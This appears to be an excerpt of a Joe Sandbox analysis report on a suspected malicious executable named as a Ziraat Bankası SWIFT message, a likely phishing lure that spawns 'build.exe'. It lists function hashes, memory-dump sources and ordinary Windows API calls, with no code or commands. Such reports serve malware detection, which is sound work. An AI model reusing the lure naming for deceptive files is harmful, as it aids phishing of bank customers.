Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f950b3d0e2eda897595a15a9de08bd0e85eec106a4287cb0d038cf040d73040
Instruction ID: 4514b5c2cb7799ac59fe4232116ffdb341e31be08f584ae5a357e37bbd8268fc
Opcode Fuzzy Hash: 4f950b3d0e2eda897595a15a9de08bd0e85eec106a4287cb0d038cf040d73040
Instruction Fuzzy Hash: 74210371614208DFDB16DFA8D980B16BF66EB84314F20C669D90D4B297C37AD406CA61

Function 011FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2138210152.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 73cf5378b1c30acdb373ddd60b7561b740259510d9d9b9c870780247ece9148e
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: AE11CD72404240CFDF06CF44D5C4B66BF61FB84224F24C6A9DA090A656C33AE45ACBA2

Function 0120D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140748384.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 812f06ad63823c1d7faeba1b4df0cbcf7559b244489b7e5a6c26d7ab0f7b4990
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 7B11BB75504284CFDB12CF98D5C4B15BFA2FB88314F24C6AAD9494B697C33AD40ACBA2

Function 0120D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140748384.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: e3b91a01c4ef25f684c84884b8a2b29e5d9f2956ef869be72ea92abd66383048
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 7511BB75505284DFDB02CF98C5C4B15BFA1FB84224F24C6A9D9494B697C33AD40ACB62

Function 011FD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2138210152.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065faeb799b7f41d95451d324a0eda030314ad5baf813a06a801871626afed70
Instruction ID: 6b5896bcf140592eed70d17f8a5c5eef5ae379023e4480eae80a04e8b07856f7
Opcode Fuzzy Hash: 065faeb799b7f41d95451d324a0eda030314ad5baf813a06a801871626afed70
Instruction Fuzzy Hash: 9201FC310047809EEB148A99DC84B76FF98EF45324F18C61DEF090E256C3399440C672

Function 011FD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2138210152.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0fd94251417c37640cd341381893c0fb84c73e406648249ad04e7b29702f975
Instruction ID: 79cf2676eb0e6211daedeb9ad3edc75885888f1f8a60866a09522a0eaa842b80
Opcode Fuzzy Hash: b0fd94251417c37640cd341381893c0fb84c73e406648249ad04e7b29702f975
Instruction Fuzzy Hash: 71F0F6714047849EEB248A0ADC84B62FFA8EF41734F18C55EEE080F287C3799840CBB0

Non-executed Functions

Function 07129660 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611949daa92087072a74aa11591180442d8b1aa29fa2e495507bac41007eb221
Instruction ID: 34dc37ad64b368f6581af87ad1e1b4c657d8e1cf0e466869574b12ed41d63125
Opcode Fuzzy Hash: 611949daa92087072a74aa11591180442d8b1aa29fa2e495507bac41007eb221
Instruction Fuzzy Hash: 90E1E9B4E001198FCB14DFA9C580AAEFBB2BF89305F24C669D415AB356D730AD42DF61

Function 0712B6E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0eb27b4d4d64a673d91ba9378dde22cf86ecbc3d55f1b70f42fdc194e50f1f
Instruction ID: 023705260e2999e1565a0be513df21dc6986f8b3705b1bc450d0f74bac563ee4
Opcode Fuzzy Hash: 0e0eb27b4d4d64a673d91ba9378dde22cf86ecbc3d55f1b70f42fdc194e50f1f
Instruction Fuzzy Hash: C8E1E9B4E041198FCB14DFA9C580AAEFBB2BF49305F24C669D418AB356D730AD42DF61

Function 07129228 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a434bd92f20abd85e4c18b6720f432ac75aceba4761cbb95103d068e79cece
Instruction ID: 859ebeed01d527fa4fe4e2b700a9a403e2118b9a95074583451c8fc15ae4abf7
Opcode Fuzzy Hash: b7a434bd92f20abd85e4c18b6720f432ac75aceba4761cbb95103d068e79cece
Instruction Fuzzy Hash: E4E1E9B4E001198FCB14DFA9C5909AEFBF2FF89305F248669D418AB356D730A942DF61

Function 0712AD38 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6fada9f9f9bb7427759b0e5388d7f56b17e8e664816ebfe534d83121999343b
Instruction ID: dfdf9fd03a3380bd8d3bf2f1880e360945d258dbb84ece7e275238b7969a57b0
Opcode Fuzzy Hash: c6fada9f9f9bb7427759b0e5388d7f56b17e8e664816ebfe534d83121999343b
Instruction Fuzzy Hash: 35E1D9B4E001198FCB14DFA9C5809AEFBB2BF89305F24C659D818A7356D731AD42DF61

Function 0712A900 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a7f9609566a95674a7dd3f33da6e158c92299afeb6dc50c6283d4e0d7d5f62
Instruction ID: 60fc041a12b032697bef5ada322cbcb76be9779b2794b3b894270da5f0668e89
Opcode Fuzzy Hash: 42a7f9609566a95674a7dd3f33da6e158c92299afeb6dc50c6283d4e0d7d5f62
Instruction Fuzzy Hash: 85E1EAB4E001198FCB14DFA9C5809AEFBB2BF89305F24C659D814AB356D731AD42DFA1

Function 07120559 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb746f83c24a3539e0c628031496b4e9b7aef94302fc12ac3b8a24f283665330
Instruction ID: 0d3e2b60e193798ff4bef0d8585eb13fa67ff67560c8a6a60931f6456e8784f5
Opcode Fuzzy Hash: cb746f83c24a3539e0c628031496b4e9b7aef94302fc12ac3b8a24f283665330
Instruction Fuzzy Hash: 89D1F331D20B5A8ACB11EBA8D950B9DF771FF95200F10C79AD10977224EB70AAC9CB91

Function 07120560 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb699e302ec63abdc9456f7c2fdb605a6a44b513df7ffd3026d719ab6876156
Instruction ID: 4efb8cb71a9113c3b779f712d9c46dd70f77ff170f057a1f328fe4a2f02cf415
Opcode Fuzzy Hash: bdb699e302ec63abdc9456f7c2fdb605a6a44b513df7ffd3026d719ab6876156
Instruction Fuzzy Hash: 41D1E331D20B5A8ACB11EBA8D950B9DF771FF95300F10C79AD50977224EB70AAC9CB91

Function 0127D344 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa421351c688d2016a1b0bfc03dd4ec07cebff62665fd629198dde81625a16c9
Instruction ID: 84d729b489b937071f73ce5641b1f9fa908c60a3629911135488212edc6a8943
Opcode Fuzzy Hash: fa421351c688d2016a1b0bfc03dd4ec07cebff62665fd629198dde81625a16c9
Instruction Fuzzy Hash: 27A1A132E2421ACFCF16DFB4C9445AEBBF2FF85300B15856AE911AB265DB71D906CB40

Function 0712A8EF Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539f852197064c1669d8725de9ec7b6edf05f77496f42b19a72aa9e4e1fd75dc
Instruction ID: 19221f0636451d5533020b18d35a23a1145df2b600a8883108bcdef61f5fbea4
Opcode Fuzzy Hash: 539f852197064c1669d8725de9ec7b6edf05f77496f42b19a72aa9e4e1fd75dc
Instruction Fuzzy Hash: 5051FCB4E002198FDB15DFA9C9805AEFBB2FF89305F24C56AD418A7256D7309D42CFA1

Analysis Process: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exePID: 1436, Parent PID: 5600COMMON

Executed Functions

Function 013F0540 Relevance: 3.0, Strings: 2, Instructions: 529COMMON

Download Yara Rule

Strings

8aq, xrefs: 013F0925
JCuq, xrefs: 013F0851

Memory Dump Source

Source File: 00000007.00000002.2125214208.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: 8aq$JCuq
API String ID: 0-3475560027
Opcode ID: 55d072adc1ddd825e21ebb1e43526d630122585adf812828ebc00e3064e612a1
Instruction ID: 35d078b29cfad650b677a955b6a2b765a29d1778940cbda5b90f81cce51d815b
Opcode Fuzzy Hash: 55d072adc1ddd825e21ebb1e43526d630122585adf812828ebc00e3064e612a1
Instruction Fuzzy Hash: 71518F34700211CFDB08AB7DD558A2A7BABFF88304F148568E409973A6DF79DC4AC792

Function 013F0848 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

8aq, xrefs: 013F0925
JCuq, xrefs: 013F0851

Memory Dump Source

Source File: 00000007.00000002.2125214208.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: 8aq$JCuq
API String ID: 0-3475560027
Opcode ID: eb4adc8be26865e5b8f3acb5d81d8883f75667741f9e4ee7c4b5a7a826c6de4a
Instruction ID: 4642df449c09daf2442d537a3456e7814cee9d744ad3f8e9782b3e6762e76bc7
Opcode Fuzzy Hash: eb4adc8be26865e5b8f3acb5d81d8883f75667741f9e4ee7c4b5a7a826c6de4a
Instruction Fuzzy Hash: 5651A234700215DFCB08AB7DD558A2A7BABFF88304F1484A8E509973A6DF79DC46C792

Function 013F0AA9 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

dLcq, xrefs: 013F0AF3
Te]q, xrefs: 013F0ADD

Memory Dump Source

Source File: 00000007.00000002.2125214208.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: Te]q$dLcq
API String ID: 0-1133975778
Opcode ID: 5d71a1c24a4e3c017e6fd34ef154b19b0bf9082b5b8a3561bd676ad71c86e7ca
Instruction ID: 206fac1f7d62d2268d14d8d81cab0148341ae269501a4c9df585a28fb59c7856
Opcode Fuzzy Hash: 5d71a1c24a4e3c017e6fd34ef154b19b0bf9082b5b8a3561bd676ad71c86e7ca
Instruction Fuzzy Hash: 85412634B002089FCB18DF69C598AADBBF6BF49704F1544A9E546DB3A2CA71DC05CB81

Function 013F0C39 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2125214208.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4436a05d5f3ca03d4b27e787d2d311b75d65def7226569976059e275abe70729
Instruction ID: cd416244afea019db31c5e89da2922d9b5fb8a727e772fec62bed0f2cb784c77
Opcode Fuzzy Hash: 4436a05d5f3ca03d4b27e787d2d311b75d65def7226569976059e275abe70729
Instruction Fuzzy Hash: 38214734A40209DFDB18CF98D589BAEBBB6FF08719F14405DFA069B3A2CB719841CB40

Analysis Process: build.exePID: 6508, Parent PID: 1436COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.9%
Total number of Nodes:	81
Total number of Limit Nodes:	10

Executed Functions

Function 069E57D0 Relevance: 2.6, APIs: 1, Instructions: 1140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2732999700.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_69e0000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b630098c21a4170e8e25b81d870cb9023176522b97c8cb2b9c71630c0b4319
Instruction ID: 2f2762e9d23dacbbb8baa30981c1f8c88039c494c475c7e3e98411ff08fb8ca3
Opcode Fuzzy Hash: d6b630098c21a4170e8e25b81d870cb9023176522b97c8cb2b9c71630c0b4319
Instruction Fuzzy Hash: 94C2AF74E012298FDBA5EF24D898B9DBBB1BF89304F1085E9D40DA7250DB31AE85CF45

Function 0100AE30 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0100B086

Memory Dump Source

Source File: 00000009.00000002.2618656983.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1000000_build.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f7f86870fc0bbda45bf2e4f9ecc778b2b3db1a6db610c855b3f57a58517072f3
Instruction ID: 09fd8d75732b084767ac446bb0e28c5b0fd497d08abee2d22941fd4b638a96b7
Opcode Fuzzy Hash: f7f86870fc0bbda45bf2e4f9ecc778b2b3db1a6db610c855b3f57a58517072f3
Instruction Fuzzy Hash: BB8146B0A00B45CFE765DF69D0407AABBF1FF88304F00896DE18A97A91D775E909CB91

Function 01005935 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010059F1

Memory Dump Source

Source File: 00000009.00000002.2618656983.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1000000_build.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 515e2b8ae9e36cbac841578c4d81d5d7440cfbfa7784eab4ca8e8c9ec6408747
Instruction ID: 7c6c6d00e0997ad5aadc16342d3951c5aa965d817be858c1c53ebf1f74c2d637
Opcode Fuzzy Hash: 515e2b8ae9e36cbac841578c4d81d5d7440cfbfa7784eab4ca8e8c9ec6408747
Instruction Fuzzy Hash: 6741E2B0C00719CBEB25DFAAC884B9DBBF5BF49304F20805AD418AB251DB756945CF91

Function 01004248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010059F1

Memory Dump Source

Source File: 00000009.00000002.2618656983.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1000000_build.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0ea217afbbbc1ff16dcda5e762376927039361d44155c717682b2d54ffa23a40
Instruction ID: 1813b0191d54963e9ba9322c5da4096b10c5d8050a2916b57b5ae4a964633b94
Opcode Fuzzy Hash: 0ea217afbbbc1ff16dcda5e762376927039361d44155c717682b2d54ffa23a40
Instruction Fuzzy Hash: 8A41CFB0C00719CBEB25DFA9C884B9DBBF5FF49304F20806AD409AB255DB756986CF91

Function 0100C9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0100D2C6,?,?,?,?,?), ref: 0100D387

Memory Dump Source

Source File: 00000009.00000002.2618656983.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1000000_build.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9655db06b9e520a06b6836d395f850e3a16761eff9d306d93293d70866058fea
Instruction ID: 3188f03021fe491075fda4b3462f4fb7a886933b78e14eff83967d282cf1ae8a
Opcode Fuzzy Hash: 9655db06b9e520a06b6836d395f850e3a16761eff9d306d93293d70866058fea
Instruction Fuzzy Hash: 1B21E5B59002089FDB10CF9AD984AEEBFF5FB48310F14801AE958A3350D378A950CFA4

Function 0100D2F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0100D2C6,?,?,?,?,?), ref: 0100D387

Memory Dump Source

Source File: 00000009.00000002.2618656983.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1000000_build.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1736c2d6d49b1e92ce6653fad25a28ae6b0bf88d5bb5dab7db878edea4cbef6f
Instruction ID: 36eb05090cf30dcd339a208fc9acbf3145e79474099cb8de71ac58db29bdc196
Opcode Fuzzy Hash: 1736c2d6d49b1e92ce6653fad25a28ae6b0bf88d5bb5dab7db878edea4cbef6f
Instruction Fuzzy Hash: EC21E6B59002489FDB10CF9AD584ADEFFF5FB48314F14801AE958A3350C378A940CFA4

Function 069ECC10 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069ECB76), ref: 069ECC7E

Memory Dump Source

Source File: 00000009.00000002.2732999700.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_69e0000_build.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 25944140d272ff64e4865c0f912e70189a8941b4d6ff68c337d361c5e970eefe
Instruction ID: a787d14c830eecd6f66f5164d6c6dd588917637e5d680dd4b3556b726d853a4e
Opcode Fuzzy Hash: 25944140d272ff64e4865c0f912e70189a8941b4d6ff68c337d361c5e970eefe
Instruction Fuzzy Hash: 041114B5D003498BDB20DF9AD944A9EFBF9EB88210F10841AD429A7610C379A545CFA1

Function 069EC668 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,069ECB76), ref: 069ECC7E

Memory Dump Source

Source File: 00000009.00000002.2732999700.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_69e0000_build.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 227e1881cf4603cfbb6587747277b3fb91fe3da2ce5d6302ff4d84c3071143ac
Instruction ID: adaba730f38f682796c4a6122220d287aaa6b006155c15699448fb88404c1879
Opcode Fuzzy Hash: 227e1881cf4603cfbb6587747277b3fb91fe3da2ce5d6302ff4d84c3071143ac
Instruction Fuzzy Hash: A01123B6D00348CFDB10DF9AC544A9EFBF9EF88310F10846AD469A7610C379A545CFA0

Function 06D19DF8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D19E5D

Memory Dump Source

Source File: 00000009.00000002.2742316516.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d10000_build.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4105efa6cc76b70bbd9d7d899a1321cd29dbc6d8052ef20b3fdc40f1faadd09c
Instruction ID: 0ead5fbef32eb81855761e393991e7e8f7105ee1e8f6ec971ec9c356952b5ff2
Opcode Fuzzy Hash: 4105efa6cc76b70bbd9d7d899a1321cd29dbc6d8052ef20b3fdc40f1faadd09c
Instruction Fuzzy Hash: 401103B59002599FDB10DF99D884BEEFFF4FB48320F10855AE559A7240C379AA44CFA1

Function 0100B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0100B086

Memory Dump Source

Source File: 00000009.00000002.2618656983.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1000000_build.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 259a58ef4d4dda778936958bc32762953aab55455a5ca725a393f8d456519234
Instruction ID: fd2062da2c4af6b18caeead8da9d6e1ebccd341be2cbbb987dd82000016a0b0e
Opcode Fuzzy Hash: 259a58ef4d4dda778936958bc32762953aab55455a5ca725a393f8d456519234
Instruction Fuzzy Hash: AC11DFB5C003498FEB20DF9AD444A9EFBF5EB89310F10845AD569A7250C379A545CFA1

Function 06D192B0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D19E5D

Memory Dump Source

Source File: 00000009.00000002.2742316516.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d10000_build.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 14f2dcc4d7a307128c980530677cd00a8dcef37e50e6c113e9287d6a01f45d39
Instruction ID: 8ead3dddcb294664838e77b0122086ae55cb97905910610e3cf974854043c3b2
Opcode Fuzzy Hash: 14f2dcc4d7a307128c980530677cd00a8dcef37e50e6c113e9287d6a01f45d39
Instruction Fuzzy Hash: 6F1106B58003489FDB50DF99D885BEEBBF8FB48310F10845AE519A7201C3B5AA44CFA5

Function 00CCD654 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2616926032.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ccd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f656d47ab03acfc01eed930ccc00d5d5e849ce667e9ee9d596905d3a81c24e90
Instruction ID: 9d5164582e55b1ad4c883e9d017d60f4bd534584417e074a3bc33fd8856547ad
Opcode Fuzzy Hash: f656d47ab03acfc01eed930ccc00d5d5e849ce667e9ee9d596905d3a81c24e90
Instruction Fuzzy Hash: 6321F475500240DFCB059F14D9C4F26BFA5FB88314F24867DE94A0A25AC33AD856DBA1

Function 00CCD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2616926032.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ccd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 237d52061fd4d811c04fb32fa82e2ab562069bf6ac7dcf069be59b3d6d15290c
Instruction ID: cce694aa22a645b20ce812364fe2a49c958be058500044acb5a93ad26786c1d0
Opcode Fuzzy Hash: 237d52061fd4d811c04fb32fa82e2ab562069bf6ac7dcf069be59b3d6d15290c
Instruction Fuzzy Hash: 342103B1500204DFDB09DF14D9C0F26BF65FB98324F24C57DEA0A0B256C33AE856DAA2

Function 00CDD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2617422073.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cdd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400fb2ad8c854a75a6a1bd9ca03c1bccbca959d09f5e877b76499866d05e3f19
Instruction ID: 6fae04aa985d7bd9ac7d9ab37f9e720632e946f2cc76210a0a400a2870a93b70
Opcode Fuzzy Hash: 400fb2ad8c854a75a6a1bd9ca03c1bccbca959d09f5e877b76499866d05e3f19
Instruction Fuzzy Hash: F821D371904204DFCB14DF24D9C4B26BB65EB88314F24C56ADA0A4B356C33AE806CA61

Function 00CDD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2617422073.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cdd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d38ed897a1ce7a44691d797e6d72c9d1f84f5b59609ceb9a71422c8b48c9a41
Instruction ID: f1aad0934e21a45c9f6427932d414dda2006848364be6f826535a1cee32cc251
Opcode Fuzzy Hash: 9d38ed897a1ce7a44691d797e6d72c9d1f84f5b59609ceb9a71422c8b48c9a41
Instruction Fuzzy Hash: 6A218E755093808FCB12CF24D994715BF71EB86314F28C5EBD9498B6A7C33A980ACB62

